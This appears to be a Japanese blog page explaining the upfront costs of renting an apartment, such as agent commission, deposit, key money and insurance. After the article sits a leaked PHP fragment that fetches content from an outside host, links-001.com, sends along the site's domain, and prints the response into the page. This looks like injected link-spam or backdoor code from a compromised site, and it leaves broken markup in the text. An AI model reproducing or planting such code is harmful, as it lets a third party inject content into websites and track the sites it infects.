前へ
次へ

賃貸マンションを借りるときにかかる費用

賃貸マンションの契約をするときにはある程度の資金を用意しておく必要があります。物件を探しているときには不動産会社を利用するのが一般的ですが、契約をする前にお金を請求されることはまずありません。しかし、契約をする段階になると一度に多額の請求をされることになるので、まとまったお金を準備しておかなければならないのです。賃貸マンションの契約をするときにかかるお金は大まかには三つに分けることができます。一つ目は不動産会社に対して支払うお金です。不動産会社は賃貸契約を成立させたときに成功報酬として仲介手数料を請求して良いことが法律によって定められています。その上限額も法律に書かれていて、原則として貸主と借主から家賃の半月分ずつ、合計一ヶ月分までです。ただ、貸主と借主の両方から合意を得られれば一方に最大一ヶ月分まで請求できるようになっています。不動産会社によってどのように請求するかは異なりますが、最大で家賃一ヶ月分を仲介手数料として支払うことになるのです。二つ目はオーナーに対して支払う費用です。家賃、管理費用、敷金、礼金の四つが主なもので、物件によって金額には大きな違いがあります。通常は家賃と管理費用は前払いになっているので、日割りのお金と翌月分をまとめて支払うことになります。敷金と礼金については契約時にまとめて払う仕組みになっていて、金額が大きい場合には家賃で半年分以上にもなることもあるということは念頭に置いておきましょう。三つ目は契約条件を満たしたり、賃貸マンションでの生活をしたりするために必要な費用です。保証会社を利用するときには保証料を支払うことになり、賃貸物件に住む上では火災保険に加入するための保険料を出すことになります。この他にも鍵交換代やクリーニング代などを請求されることもあるので注意しましょう。物件を決める前にどのくらいかかるかを説明してもらっておくと資金の用意が可能かどうかを判断できます。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top